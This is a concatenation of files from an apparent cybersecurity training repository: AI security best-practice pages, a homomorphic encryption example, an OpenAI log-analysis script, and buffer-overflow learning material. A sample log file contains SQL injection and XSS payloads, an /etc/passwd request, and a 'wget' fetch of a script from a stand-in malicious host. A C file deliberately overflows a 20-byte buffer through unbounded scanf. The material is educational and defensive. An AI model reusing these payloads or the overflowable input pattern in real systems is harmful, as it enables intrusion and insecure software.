- [ATFuzzer - Dynamic Analysis Of AT Interface For Android Smartphones](http://feedproxy.google.com/~r/PentestTools/~3/OL4U89ASYkU/atfuzzer-dynamic-analysis-of-at.html)
- [Netstat2Neo4J - Create Cypher Create Statements For Neo4J Out Of Netstat Files From Multiple Machines](http://feedproxy.google.com/~r/PentestTools/~3/3d0Xl5zLmqY/netstat2neo4j-create-cypher-create.html)
- [BaseQuery - A Way To Organize Public Combo-Lists And Leaks In A Way That You Can Easily Search Through Everything](http://feedproxy.google.com/~r/PentestTools/~3/xagTe4W9uT4/basequery-way-to-organize-public-combo.html)
- [Attack Monitor - Endpoint Detection And Malware Analysis Software](http://feedproxy.google.com/~r/PentestTools/~3/_RxX4yOr-Ts/attack-monitor-endpoint-detection-and.html)
- [Crashcast-Exploit - This Tool Allows You Mass Play Any YouTube Video With Chromecasts Obtained From Shodan.io](http://feedproxy.google.com/~r/PentestTools/~3/xeXSGXnN_xA/crashcast-exploit-this-tool-allows-you.html)
- [Tool-X - A Kali Linux Hacking Tool Installer](http://feedproxy.google.com/~r/PentestTools/~3/JqzGZm7j4JQ/tool-x-kali-linux-hacking-tool-installer.html)
- [SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool](http://feedproxy.google.com/~r/PentestTools/~3/RNZTk3qTooc/sqlmap-v13-automatic-sql-injection-and.html)
- [Stretcher - Tool Designed To Help Identify Open Elasticsearch Servers That Are Exposing Sensitive Information](http://feedproxy.google.com/~r/PentestTools/~3/PdXu9zuRDIg/stretcher-tool-designed-to-help.html)
- [Aztarna - A Footprinting Tool For Robots](http://feedproxy.google.com/~r/PentestTools/~3/Q9CYfShlqRA/aztarna-footprinting-tool-for-robots.html)
- [Hediye - Hash Generator & Cracker Online Offline](http://feedproxy.google.com/~r/PentestTools/~3/p0oO5qBUFoI/hediye-hash-generator-cracker-online.html)
- [Killcast - Manipulate Chromecast Devices In Your Network](http://feedproxy.google.com/~r/PentestTools/~3/rMCHdNb3sTI/killcast-manipulate-chromecast-devices.html)
- [bypass-firewalls-by-DNS-history - Firewall Bypass Script Based On DNS History Records](http://feedproxy.google.com/~r/PentestTools/~3/4GvtphGIZmM/bypass-firewalls-by-dns-history.html)
- [WiFi-Pumpkin v0.8.7 - Framework for Rogue Wi-Fi Access Point Attack](http://feedproxy.google.com/~r/PentestTools/~3/HogR4BTI3tM/wifi-pumpkin-v087-framework-for-rogue.html)
- [H8Mail - Email OSINT And Password Breach Hunting](http://feedproxy.google.com/~r/PentestTools/~3/u6x3-7n6oMI/h8mail-email-osint-and-password-breach.html)
- [Kube-Hunter - Hunt For Security Weaknesses In Kubernetes Clusters](http://feedproxy.google.com/~r/PentestTools/~3/Dr1bT8peAAc/kube-hunter-hunt-for-security.html)
- [Metasploit 5.0 - The World’s Most Used Penetration Testing Framework](http://feedproxy.google.com/~r/PentestTools/~3/WdwaF60VaxA/metasploit-50-worlds-most-used.html)
- [Interlace - Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support](http://feedproxy.google.com/~r/PentestTools/~3/WogS-qr4dno/interlace-easily-turn-single-threaded.html)
- [Twifo-Cli - Get User Information Of A Twitter User](http://feedproxy.google.com/~r/PentestTools/~3/Sbc3gunRkBE/twifo-cli-get-user-information-of.html)
- [Sitadel - Web Application Security Scanner](http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html)
- [Pe-Sieve - Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)](http://feedproxy.google.com/~r/PentestTools/~3/MV1mlXFmkpg/pe-sieve-recognizes-and-dumps-variety.html)
- [Malboxes - Builds Malware Analysis Windows VMs So That You Don'T Have To](http://feedproxy.google.com/~r/PentestTools/~3/sZXmRx1pB7E/malboxes-builds-malware-analysis.html)
- [Snyk - CLI And Build-Time Tool To Find & Fix Known Vulnerabilities In Open-Source Dependencies](http://feedproxy.google.com/~r/PentestTools/~3/elMWRHLI054/snyk-cli-and-build-time-tool-to-find.html)
- [Shed - .NET Runtime Inspector](http://feedproxy.google.com/~r/PentestTools/~3/byWGTLrRRMA/shed-net-runtime-inspector.html)
- [Stardox - Github Stargazers Information Gathering Tool](http://feedproxy.google.com/~r/PentestTools/~3/kAWqztoZ97E/stardox-github-stargazers-information.html)
- [Commix v2.7 - Automated All-in-One OS Command Injection And Exploitation Tool](http://feedproxy.google.com/~r/PentestTools/~3/mjOk7rQhp2Y/commix-v27-automated-all-in-one-os.html)
- [AutoSploit v3.0 - Automated Mass Exploiter](http://feedproxy.google.com/~r/PentestTools/~3/nDoUfG2uHQg/autosploit-v30-automated-mass-exploiter.html)
- [Faraday v3.5 - Collaborative Penetration Test and Vulnerability Management Platform](http://feedproxy.google.com/~r/PentestTools/~3/Fq1vFkcIIFI/faraday-v35-collaborative-penetration.html)
- [Recaf - A Modern Java Bytecode Editor](http://feedproxy.google.com/~r/PentestTools/~3/mAzq3GzpHIg/recaf-modern-java-bytecode-editor.html)
- [dnSpy - .NET Debugger And Assembly Editor](http://feedproxy.google.com/~r/PentestTools/~3/JZaPW594CQE/dnspy-net-debugger-and-assembly-editor.html) |
Markdown | h4cker/README.md | # Cyber Security Resources
<center><img src="https://h4cker.org/img/h4cker2.PNG" width="200" height="300" /> </center>
This repository includes thousands of cybersecurity-related references and resources and it is maintained by [Omar Santos](https://omarsantos.io/). This GitHub repository has been created to provide supplemental material to several books, video courses, and live training created by Omar Santos and other co-authors. It provides over 10,000 references, scripts, tools, code, and other resources that help offensive and defensive security professionals learn and develop new skills. This GitHub repository provides guidance on how build your own hacking environment, learn about offensive security (ethical hacking) techniques, vulnerability research, exploit development, reverse engineering, malware analysis, threat intelligence, threat hunting, digital forensics and incident response (DFIR), includes examples of real-life penetration testing reports, and more.
## The Art of Hacking Series
The [Art of Hacking Series](http://theartofhacking.org) is a series of video courses and live training that help you get up and running with your cybersecurity career. The following are the different video courses that are part of the Art of Hacking series:
* [Security Penetration Testing (The Art of Hacking Series)](https://www.safaribooksonline.com/library/view/security-penetration-testing/9780134833989)
* [Wireless Networks, IoT, and Mobile Devices Hacking (The Art of Hacking Series)](https://www.safaribooksonline.com/library/view/wireless-networks-iot/9780134854632/)
* [Enterprise Penetration Testing and Continuous Monitoring (The Art of Hacking Series)](https://www.safaribooksonline.com/videos/enterprise-penetration-testing/9780134854779)
* [Hacking Web Applications: Security Penetration Testing for Today's DevOps and Cloud Environments (The Art of Hacking Series)](https://www.safaribooksonline.com/videos/hacking-web-applications/9780135261422)
These courses serve as comprehensive guide for any network and security professional who is starting a career in ethical hacking and penetration testing. It also can help individuals preparing for the [Offensive Security Certified Professional (OSCP)](https://www.offensive-security.com/information-security-certifications/), the [Certified Ethical Hacker (CEH)](https://www.eccouncil.org/programs/certified-ethical-hacker-ceh/), [CompTIA PenTest+](https://certification.comptia.org/certifications/pentest) and any other ethical hacking certification. This course helps any cyber security professional that want to learn the skills required to becoming a professional ethical hacker or that want to learn more about general hacking methodologies and concepts.
These video courses are published by Pearson, but this GitHub repository is maintained and supported by the lead author of the series [Omar Santos](https://omarsantos.io/).
## Live Training
Other Live Training and Video Courses: https://h4cker.org/training |
Markdown | h4cker/adversarial_emulation/README.md | # Adversarial Emulation Tools
- [Caldera](https://github.com/mitre/caldera)
- [SCYTHE](https://www.scythe.io/platform)
- [Randori](https://www.randori.com/attack/) |
Markdown | h4cker/ai_security/README.md | # AI Security Best Practices and Resources
## AI Security Best Practices and Tools
- [High-Level AI Security Best Practices](<AI Security Best Practices/AI-security-tools-and-frameworks.md>)
- [Homomorphic-Encryption](<AI Security Best Practices/homomorphic-encryption.md>)
- [AI Security Tools and Frameworks](<AI Security Best Practices/AI-security-tools-and-frameworks.md>)
- [AI Secure Deployment Tips](<AI Security Best Practices/secure-deployment.md>)
- [AI Secure Design Tips](<AI Security Best Practices/secure-design.md>)
- [Threat Modeling](<AI Security Best Practices/threat-modeling.md>)
## AI Security Resources from Omar's Training Sessions
- [Cybersecurity Learning Prompts](https://github.com/santosomar/chatgpt-cybersecurity-prompts)
- [Networking Prompts](https://github.com/santosomar/chatgpt-networking-prompts)
- [Programming Learning Prompts](https://github.com/santosomar/chatgpt-programming-prompts) |
Python | h4cker/ai_security/AI for Incident Response/analyzing_logs.py | '''
A simple test to interact with the OpenAI API
and analyze logs from applications, firewalls, operating systems, and more.
Author: Omar Santos, @santosomar
'''
# Import the required libraries
# pip3 install openai python-dotenv
# Use the line above if you need to install the libraries
from dotenv import load_dotenv
import openai
import os
# Load the .env file
load_dotenv()
# Get the API key from the environment variable
openai.api_key = os.getenv('OPENAI_API_KEY')
# Read the diff from a file
with open('logs.txt', 'r') as file:
log_file = file.read()
# Prepare the prompt
prompt = [{"role": "user", "content": f"Explain the following logs:\n\n{log_file} . Explain if there is any malicious activity in the logs."}]
# Generate the AI chat completion via the OpenAI API
# I am only using GTP 3.5 Turbo for this example.
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo-16k",
messages=prompt,
max_tokens=10000
)
# print the response from the OpenAI API
print(response.choices[0].message.content) |
Text | h4cker/ai_security/AI for Incident Response/logs.txt | [2026-08-18 12:34:56] Failed login attempt for user 'admin' from IP 192.168.1.10
[2026-08-18 12:34:57] Failed login attempt for user 'admin' from IP 192.168.1.10
[2026-08-18 12:34:58] Failed login attempt for user 'admin' from IP 192.168.1.10
[2026-08-18 13:45:23] SQL query error: SELECT * FROM users WHERE username='' OR '1'='1'; -- ' AND password='password'
[2026-08-18 14:56:12] GET /login HTTP/1.1 User-Agent: Possible-Scanning-Bot/1.0
[2026-08-18 15:23:45] GET /admin/dashboard HTTP/1.1 from IP 203.0.113.5
[2026-08-18 16:34:12] Command executed: /bin/bash -c 'wget http://malicious.com/exploit.sh'
[2026-08-18 17:45:23] GET /etc/passwd HTTP/1.1 from IP 192.168.1.20
[2026-08-18 18:56:34] 1000 requests received from IP 192.168.1.30 in the last 60 seconds
[2026-08-18 19:12:45] GET /search?q=<script>alert('XSS')</script> HTTP/1.1
[2026-08-18 20:23:56] Connection attempt to port 4444 from IP 192.168.1.40
[2026-08-18 21:34:12] GET /downloads/malicious.exe HTTP/1.1 from IP 192.168.1.50 |
Markdown | h4cker/ai_security/AI Security Best Practices/AI-security-tools-and-frameworks.md | # Exploring AI Security Tools and Frameworks
Different tools and frameworks have been developed to ensure the robustness, resilience, and security of AI systems. The following are some of the leading AI security tools and frameworks currently available.
## AI Security Tools
Several tools have been developed to help identify potential vulnerabilities, protect systems from attacks, and improve the overall security posture of AI systems.
1. **Microsoft's Counterfit**: Counterfit is an open-source tool from Microsoft for testing the security of AI systems. It provides a way for security professionals to automate the process of launching attacks against AI models to assess their resilience and robustness. Counterfit supports a wide range of AI models and has a flexible, scriptable interface for conducting customized attacks.
[Microsoft Counterfit](https://github.com/Azure/counterfit)
2. **IBM's Adversarial Robustness Toolbox**: This is an open-source library dedicated to adversarial attacks and their defenses for AI models. The Adversarial Robustness Toolbox contains implementations of many popular attack and defense methods and provides resources for researchers to develop new techniques.
[IBM Adversarial Robustness Toolbox](https://github.com/Trusted-AI/adversarial-robustness-toolbox)
3. **Google's TensorFlow Privacy**: TensorFlow Privacy is a library that makes it easier for developers to implement privacy-preserving machine learning models. The library incorporates algorithms that provide strong privacy guarantees, including Differential Privacy, a mathematical framework for quantifying data anonymization.
[TensorFlow Privacy](https://github.com/tensorflow/privacy)
4. **Facebook's PyTorch Captum**: Captum is an open-source model interpretability library for PyTorch. It provides a unified interface for several attribution algorithms that allow developers and researchers to understand the importance of different features in their models' predictions.
[PyTorch Captum](https://github.com/pytorch/captum)
## AI Security Frameworks
While tools focus on specific tasks, frameworks provide an overarching structure to guide the design, development, and deployment of secure AI systems.
1. **OpenAI's AI Safety Framework**: OpenAI's AI Safety initiative provides guidelines and resources to promote the safe and beneficial use of AI. It encompasses a range of techniques, including reward modeling, interpretability, and distributional shift detection, designed to make AI systems safer and more robust.
[OpenAI Safety](https://openai.com/research/#safety)
2. **Microsoft's Responsible AI Framework**: Microsoft's Responsible AI initiative provides a set of principles and practices to guide the development and use of AI in a manner that is ethical, responsible, and aligned with societal values. This includes a focus on fairness, reliability and safety, privacy and security, inclusiveness, transparency, and accountability.
[Microsoft Responsible AI](https://www.microsoft.com/en-us/ai/responsible-ai)
3. **Google's AI Hub**: Google's AI Hub provides a wealth of resources for developers working on AI, including tools, best practices, and pre-trained models. It includes a section on Responsible AI, which encompasses fairness, interpretability, privacy, and safety.
[Google AI Hub](https://aihub.cloud.google.com/)
The tools and frameworks discussed in this article are only a small selection of the resources available to developers and researchers working on AI security. As AI continues to evolve and mature, it's crucial to continuously stay informed about the latest developments in AI security and take advantage of the tools and frameworks that best meet your specific needs and contexts. |
Markdown | h4cker/ai_security/AI Security Best Practices/high-level-best-practices.md | # Top AI Security Best Practices
The following are some of the top AI security best practices. Many of these AI-specific best practices are, in fact, universal strategies relevant to securing any system or environment. Their effective implementation is crucial not only for AI systems, but across all technology platforms and infrastructures.
1. **Secure AI Development Lifecycle**: Establish a secure development lifecycle for AI systems that includes phases for requirement analysis, design, development, testing, deployment, and maintenance. Each phase should include appropriate security checks and balances.
2. **Threat Modeling and Risk Assessment**: Identify potential threats and vulnerabilities in your AI system, assess the risks associated with them, and develop mitigation strategies. Tools like Microsoft's Counterfit and IBM's Adversarial Robustness Toolbox can aid in this process.
3. **Privacy-Preserving Techniques**: Use privacy-preserving techniques, such as differential privacy, federated learning, and homomorphic encryption, to ensure the confidentiality of the data used by the AI system.
4. **Robust and Resilient AI Design**: Design AI models to be robust against various forms of perturbations, including adversarial attacks, and resilient to broader disruptions.
5. **Secure APIs**: Ensure all APIs used in the system are secure and do not expose the AI system or the underlying data to potential breaches.
6. **Authentication and Access Control**: Implement strong authentication and access control mechanisms to ensure that only authorized individuals can interact with the AI system.
7. **Secure Data Storage**: Implement secure data storage practices for both the training data and any data collected or produced by the AI system.
8. **Continuous Monitoring and Auditing**: Monitor the AI system's performance and usage continuously to detect any anomalies or indications of a security breach. Regularly audit the AI system for potential security vulnerabilities.
9. **Regular Updates and Patching**: Regularly update and patch the AI system, including any software, libraries, or dependencies it uses, to protect against known vulnerabilities.
10. **Incident Response Planning**: Have a plan in place for how to respond if a security incident does occur, including steps for identifying the breach, containing it, investigating it, and recovering from it.
By following these best practices, you can significantly enhance the security of your AI systems, protecting both the systems themselves and the valuable data they process. Check out the other resources in this GitHub repository to learn more about these AI best practices. |
Markdown | h4cker/ai_security/AI Security Best Practices/homomorphic-encryption.md | # Homomorphic Encryption
Homomorphic encryption is a form of encryption allowing one to perform calculations on encrypted data without decrypting it first. The result of the computation is in encrypted form, and when decrypted, it matches the result of the operation as if it had been performed on the plain text.
This method is beneficial for privacy-preserving computations on sensitive data. It is especially useful for cloud computing, where you can process your data on third-party servers without revealing any sensitive information to those servers.
Although promising, homomorphic encryption is computationally intensive and not yet practical for all applications. Researchers are working on improving the efficiency of these methods, and we can expect their usage to increase in the future.
The following is a simple example of addition and multiplication operations using homomorphic encryption with Python and a library called Pyfhel, which stands for Python for Fully Homomorphic Encryption Libraries. In this example, we will encrypt two integers, perform addition and multiplication operations on the encrypted data, and then decrypt the results.
Install the Pyfhel library:
```python
pip install Pyfhel
```
Here is the simple Python code:
```python
from Pyfhel import Pyfhel, PyCtxt
# Create a Pyfhel object
HE = Pyfhel()
# Generate a public and secret key
HE.keyGen()
# Encrypt two numbers
num1 = 5
num2 = 10
enc_num1 = HE.encryptInt(num1)
enc_num2 = HE.encryptInt(num2)
# Perform addition operation on encrypted numbers
enc_result_add = enc_num1 + enc_num2
# Perform multiplication operation on encrypted numbers
enc_result_mul = enc_num1 * enc_num2
# Decrypt the results
result_add = HE.decryptInt(enc_result_add)
result_mul = HE.decryptInt(enc_result_mul)
print(f"Decrypted addition result: {result_add}, Expected: {num1+num2}")
print(f"Decrypted multiplication result: {result_mul}, Expected: {num1*num2}")
```
This script creates an instance of `Pyfhel`, generates a public and secret key with `keyGen()`, encrypts two integers using `encryptInt()`, adds and multiplies them, then decrypts the results using `decryptInt()`. The decrypted results should be equal to the results of adding and multiplying the original, unencrypted numbers.
Remember that this is a simplified example. In a real-world scenario, key management and ensuring the security of the encryption and decryption operations are crucial and more complex. Furthermore, full homomorphic encryption is a computationally intensive task and may not be suitable for all types of data or applications.
## References
A few resources that can provide a deeper understanding of homomorphic encryption:
1. [Homomorphic Encryption Standard](https://homomorphicencryption.org/): The official site for the Homomorphic Encryption Standard, containing detailed technical resources and documentation.
2. [Homomorphic Encryption Notations, Schemes, and Circuits](https://eprint.iacr.org/2014/062.pdf): A technical paper providing a more mathematical and in-depth exploration of various homomorphic encryption schemes.
3. [Cryptonets: Applying Neural Networks to Encrypted Data with High Throughput and Accuracy](https://www.microsoft.com/en-us/research/wp-content/uploads/2016/04/CryptonetsTechReport.pdf): A research paper from Microsoft Research demonstrating the application of homomorphic encryption in machine learning.
4. [Pyfhel Github Repository](https://github.com/ibarrond/Pyfhel): The Github repository for Pyfhel, a Python library for Homomorphic Encryption, which includes code examples and documentation.
Homomorphic encryption is a complex field that requires a decent understanding of cryptography. It's recommended to have a good grasp of the basics of cryptography before diving into homomorphic encryption. |
Markdown | h4cker/ai_security/AI Security Best Practices/secure-deployment.md | # AI Secure Deployment
High-level list of AI Secure Deployment best practices:
| Best Practice | Description |
| --- | --- |
| Use Secure APIs | All communication with the AI model should be done using secure APIs that use encryption and other security protocols. |
| Implement Authentication and Access Controls | Ensure only authorized individuals can access the deployed AI models and associated data. |
| Use Secure Communication Channels | All data exchanged with the AI model should be done over secure, encrypted communication channels. |
| Regular Updates and Patching | Ensure the software, libraries, and dependencies used by your AI model are up to date and patched for known vulnerabilities. |
| Monitor System Usage and Performance | Monitor for any anomalies that could indicate a security breach, such as unexpected spikes in system usage or a sudden decline in model performance. |
| Test for Robustness | Regularly test your AI model's robustness to adversarial attacks and other types of unexpected inputs. |
| Implement Secure Data Storage | Ensure that data used by your AI model, both for training and inference, is stored securely. |
| Privacy-preserving Techniques | If your AI model handles sensitive data, consider using privacy-preserving techniques such as differential privacy or federated learning. |
| Plan for Incident Response | Have a plan for how to respond if a security incident does occur, including steps for identifying the breach, containing it, investigating it, and recovering from it. |
| Regular Audits | Regularly audit your AI system for potential security vulnerabilities. | |
Markdown | h4cker/ai_security/AI Security Best Practices/secure-design.md | # AI Secure Design Best Practices
Secure design of AI systems involves integrating security practices at every stage of the AI development process, starting from the design phase. It aims to build robustness, privacy, fairness, and transparency into AI systems. The following are some of the best practices in secure AI system design:
| Best Practice | Description |
| --- | --- |
| Privacy-by-Design Principles | Implement practices like data minimization, anonymization, and use privacy-preserving technologies like differential privacy and homomorphic encryption. |
| Robustness against Adversarial Attacks | Use techniques such as adversarial training, robust optimization, and defensive distillation to build models that are resilient to adversarial manipulations. |
| Secure Data Pipelines | Secure and encrypt data pipelines to prevent data breaches and unauthorized access. This includes securing data in transit and at rest. |
| Incorporate Fairness and Bias Mitigation | Incorporate techniques for fairness and bias mitigation into the design of the AI system. Tools like AI Fairness 360 can be used for this purpose. |
| Transparent and Explainable AI | Design the AI system to provide explanations for its predictions, building trust with users and allowing for better scrutiny of the system's decisions. |
| Security in AI Training and Inference Infrastructure | Secure the hardware and software used for training and running AI models. Regular security audits and following best practices in cloud security can help ensure the security of the AI infrastructure. |
| Access Controls and Authentication | Implement strong access controls and authentication mechanisms to ensure only authorized individuals can access the AI system and the data it processes. |
| Regular Security Testing | Conduct regular security testing as a part of the AI system design process. This can involve penetration testing, fuzzing, and other security testing techniques. |
| Secure Model Serving | Ensure secure deployment of the machine learning model. This involves encryption, secure APIs, and regular updates and patches to address vulnerabilities. |
| Plan for Incident Response | Have a plan in place for responding to security incidents. This plan should include steps for identifying the breach, containing it, assessing the damage, and recovering from the attack. |
## Additional Resources
Resources you can refer to understand better about AI secure design:
1. [Google's AI Principles](https://ai.google/principles/): Google's approach towards ethical and secure AI development.
2. [Microsoft's Responsible AI](https://www.microsoft.com/en-us/ai/responsible-ai): Microsoft provides a set of principles and practices for responsible AI development.
3. [IBM's Trusted AI](https://www.ibm.com/cloud/architecture/content/chapter/artificial-intelligence): This link contains IBM's principles for the development of trusted AI.
4. [Ethics of AI and Robotics (Stanford Encyclopedia of Philosophy)](https://plato.stanford.edu/entries/ethics-ai/): An extensive overview of the ethical considerations in AI, including security and privacy.
5. [OWASP Top Ten for Machine Learning](https://owasp.org/www-project-machine-learning-security-top-10): A list of the top ten security risks in machine learning, as identified by the Open Web Application Security Project (OWASP).
6. [The Malicious Use of Artificial Intelligence: Forecasting, Prevention, and Mitigation](https://arxiv.org/abs/1802.07228): This paper discusses potential malicious uses of AI and possible mitigation strategies.
NOTE: Security in AI is a vast field and continuously evolving. So, staying updated with recent developments and vulnerabilities is crucial. Always follow secure coding practices and consider privacy and ethical implications while designing and implementing AI systems. |
Markdown | h4cker/ai_security/AI Security Best Practices/threat-modeling.md | # Tools for Threat Modeling AI Systems
There are several tools and methodologies that you can use to conduct threat modeling for AI systems.
| Tool / Methodology | Description | Link |
| --- | --- | --- |
| Microsoft's STRIDE Model | A model for identifying computer security threats. Useful for categorizing and remembering different types of threats. | [Microsoft STRIDE](https://docs.microsoft.com/en-us/azure/security/develop/threat-modeling-tool-threats) |
| Microsoft's Threat Modeling Tool | A tool provided by Microsoft to assist in finding threats in the design phase of software projects. | [Microsoft Threat Modeling Tool](https://www.microsoft.com/en-us/download/details.aspx?id=49168) |
| OWASP's Threat Dragon | An open-source tool from the Open Web Application Security Project. It includes system diagramming and a rule engine to auto-generate threats and countermeasures. | [Threat Dragon](https://owasp.org/www-project-threat-dragon/) |
| PASTA (Process for Attack Simulation and Threat Analysis) | A risk-based threat modeling methodology that provides a systematic approach to threat modeling. | [PASTA](https://versprite.com/blog/what-is-pasta-threat-modeling/) |
| MLSec Tools by IBM Research | A suite of tools designed to identify vulnerabilities, conduct robustness checks, and perform attack simulations in machine learning systems. | [IBM MLSec Tools](https://github.com/IBM/adversarial-robustness-toolbox) |
| Adversarial Robustness Toolbox by IBM Research | An open-source library dedicated to adversarial attacks and defenses in AI, designed to evaluate the robustness of machine learning models. | [Adversarial Robustness Toolbox](https://github.com/IBM/adversarial-robustness-toolbox) |
| AI Fairness 360 by IBM Research | An extensible open-source toolkit that can help you examine, report, and mitigate discrimination and bias in machine learning models throughout the AI application lifecycle. | [AI Fairness 360](https://aif360.mybluemix.net/) |
| Google's What-If Tool | An interactive visual interface designed to help you understand the datasets and models. | [Google What-If Tool](https://pair-code.github.io/what-if-tool/) |
## Additional Information
Threat modeling and risk assessment is the process of identifying potential threats and risks in a system and assessing their potential impact. In the context of AI systems, this process involves understanding how the AI system could be attacked, misused, or otherwise compromised, and evaluating the potential consequences.
Here are a few examples:
1. **Data Poisoning Threat**: In a data poisoning attack, an adversary might manipulate the training data to make the AI system learn incorrect patterns or behaviors. For instance, if an AI is used for a recommendation system, an attacker might try to poison the data to make the system recommend their product more frequently. The risk associated with this threat might be reputational damage, loss of user trust, and financial loss due to incorrect recommendations.
2. **Model Inversion Threat**: An attacker might attempt a model inversion attack, where they use the AI system's predictions to infer sensitive details about the training data. For example, if the AI system is a model trained to predict disease based on genetic data, an attacker could use the model to infer the genetic data of the patients used in the training set. The risk here is the potential violation of user privacy and potential legal repercussions.
3. **Adversarial Attack Threat**: Adversarial attacks involve manipulating the input to an AI system to cause it to make a mistake. For instance, an adversarial attack might involve slightly altering an image so that an image recognition AI system misclassifies it. The risk in this case could be the incorrect operation of the AI system, leading to potential negative consequences depending on the system's use case.
4. **Model Theft Threat**: An attacker might attempt to steal the AI model by using the model's API to create a copy of it. The risk here is intellectual property theft, as well as any potential misuse of the stolen model.
Risk assessment involves evaluating the likelihood and potential impact of these threats. For instance, data poisoning might be considered a high-risk threat if the AI system is trained on public data and used for critical decision-making. On the other hand, a model inversion attack might be considered a lower-risk threat if the model does not handle sensitive data or if strong privacy-preserving measures are in place. The results of this risk assessment will guide the security measures and precautions implemented in the next stages of the AI system's development lifecycle. |
Markdown | h4cker/buffer_overflow_example/additional_examples.md | # Additional Buffer Overflow Examples
The website https://exploit.education has great examples of different types of buffer overflows, format strings and heap exploitation. It includes different VMs that allow you to complete several beginner, intermediate, and advanced challenges. |
Markdown | h4cker/buffer_overflow_example/arm.md | # ARM Architecture Resources
The following are a few good resources that can help you become familiar with the ARM architecure and exploitation of ARM-based vulnerabilities.
## Tutorials and Articles
* [ARM Assembly Basics Series](https://azeria-labs.com/writing-arm-assembly-part-1/) - Azeria
* [ARM Binary Exploitation Series](https://azeria-labs.com/writing-arm-shellcode/) - Azeria
* [Smashing the ARM Stack](https://www.merckedsecurity.com/blog/smashing-the-arm-stack-part-1) - Mercked Security
* [Introduction to ARMv8 64-bit Architecture](https://quequero.org/2014/04/introduction-to-arm-architecture/) - pnuic
* [Alphanumeric RISC ARM Shellcode](http://phrack.org/issues/66/12.html) - (Phrack) - Yves Younan, Pieter Philippaerts
* [Return-Oriented Programming on a Cortex-M Processor](https://ieeexplore.ieee.org/document/8029521)
* [3or ARM Exploitation Series](https://blog.3or.de/arm-exploitation-return-oriented-programming.html) - Dimitrios Slamaris
* [Developing StrongARM/Linux Shellcode](http://www.phrack.com/issues/58/10.html) - (Phrack) - funkysh
* [Reversing and Exploiting ARM Binaries](http://www.mathyvanhoef.com/2013/12/reversing-and-exploiting-arm-binaries.html) - Mathy Vanhoef
* [ARM Exploitation for IoT Series](https://quequero.org/2017/07/arm-exploitation-iot-episode-1/) - Andrea Sindoni
* [Reverse Engineering of ARM Microcontrollers](https://rdomanski.github.io/Reverse-engineering-of-ARM-Microcontrollers/) - Rdomanski
* [ARM64 Reversing and Exploitation Part 1 - ARM Instruction Set + Simple Heap Overflow
](http://highaltitudehacks.com/2020/09/05/arm64-reversing-and-exploitation-part-1-arm-instruction-set-heap-overflow/) - HighAltitudeHacks
## Presentations
* [Exploitation on ARM](https://www.youtube.com/watch?v=kykVyJ0dm8Y) - Itzhak Avraham
* [ARM Exploitation ROPMAP](https://www.youtube.com/watch?v=VDyf_tJ8IUg) - Long Le
* [Advanced ARM Exploitation](https://www.youtube.com/watch?v=gdsPydfBfSA) - Stephen Ridley & Stephen Lawler
* [ARM Assembly and Shellcode Basics](https://www.youtube.com/watch?v=BhjJBuX0YCU) - Saumil Shah
* [Heap Overflow Exploits for Beginners (ARM Exploitation Tutorial)](https://www.youtube.com/watch?v=L8Ya7fBgEzU) - Billy Ellis
* [Introduction to Exploitation on ARM64](https://www.youtube.com/watch?v=xVyH68HFsQU) - Billy Ellis
* [Make ARM Shellcode Great Again](https://www.youtube.com/watch?v=9tx293lbGuc) - Saumil Shah
* [ARM Memory Tagging, how it improves C++ memory safety](https://www.youtube.com/watch?v=iP_iHroclgM) - Kostya Serebryany
* [Breaking Samsung's ARM Trustzone](https://i.blackhat.com/USA-19/Thursday/us-19-Peterlin-Breaking-Samsungs-ARM-TrustZone.pdf)
* [Hacker Nightmares: Giving Hackers a Headache with Exploit Mitigations](https://www.youtube.com/watch?v=riQ-WyYrxh4) - Azeria )
## Architectural References
* [ARM Architecture Reference Manual](http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.subset.architecture.reference/index.html)
* [Online ARM Assembler](https://azm.azerialabs.com/)
* [ARM TEE Reversing and Exploitation](https://github.com/enovella/TEE-reversing)
## CTF / Training Binaries
* [Exploit Me](https://github.com/bkerler/exploit_me)
* [Exploit Challenges](https://github.com/Billy-Ellis/Exploit-Challenges)
* [Azeria ARM Lab](https://azeria-labs.com/emulate-raspberry-pi-with-qemu/)
## Books
* [Practical Reverse Engineering](https://www.wiley.com/en-us/Practical+Reverse+Engineering%3A+x86%2C+x64%2C+ARM%2C+Windows+Kernel%2C+Reversing+Tools%2C+and+Obfuscation-p-9781118787311) (Chapter 2) - Bruce Dang, Alexandre Gazet and Elias Bachalany
* [Beginners Guide to Exploitation on ARM](https://zygosec.com/book.html) - Volumes 1 & 2 - Billy Ellis
* [ARM Assembly Language: Fundamentals & Techniques](https://www.amazon.co.uk/ARM-Assembly-Language-Fundamentals-Techniques/dp/1439806101) - William Hohl
## Tools
* [Ropper](https://github.com/sashs/Ropper) |
C | h4cker/buffer_overflow_example/bad_code.c | #include <stdio.h>
void secretFunction()
{
printf("Omar's Crappy Function\n");
printf("This is a super secret function!\n");
}
void echo()
{
char buffer[20];
printf("Please enter your name below:\n");
scanf("%s", buffer);
printf("You entered: %s\n", buffer);
}
int main()
{
echo();
return 0;
} |
Markdown | h4cker/buffer_overflow_example/learn_assembly.md | # Learning Assembly for the Purpose of Principles of Reverse Engineering
Learning assembly language, whether it's for x86 or ARM architectures, can be a complex task as it involves understanding the computer at a more fundamental level compared to high-level languages. Here are some important concepts and topics you should understand when learning assembly language:
1. **Basic Computer Architecture**: Before starting with assembly, it's important to understand how computers work at a fundamental level. This includes concepts like memory management, CPU architecture, registers, and instruction cycle.
2. **Data Representation**: You should understand how data is represented in a computer system, including binary, hexadecimal, and two's complement for negative numbers. Knowing how data is represented will help you understand how different instructions manipulate this data.
3. **Instruction Set Architecture (ISA)**: Every architecture (like x86 and ARM) has its own ISA, which is a set of instructions that the CPU can execute. These include instructions for moving data, arithmetic operations, logical operations, control flow, and more.
4. **Registers**: Registers are small storage locations in the CPU that store data. Understanding the role of each register and how to use them is fundamental to assembly programming.
5. **Addressing Modes**: These are the methods used to access data in memory. Some common addressing modes include direct, indirect, register, immediate, and indexed addressing.
6. **Control Flow**: This includes concepts like loops, conditional branching (if-else statements), and function calls. Assembly has instructions for each of these, but they are often more complex to implement than in high-level languages.
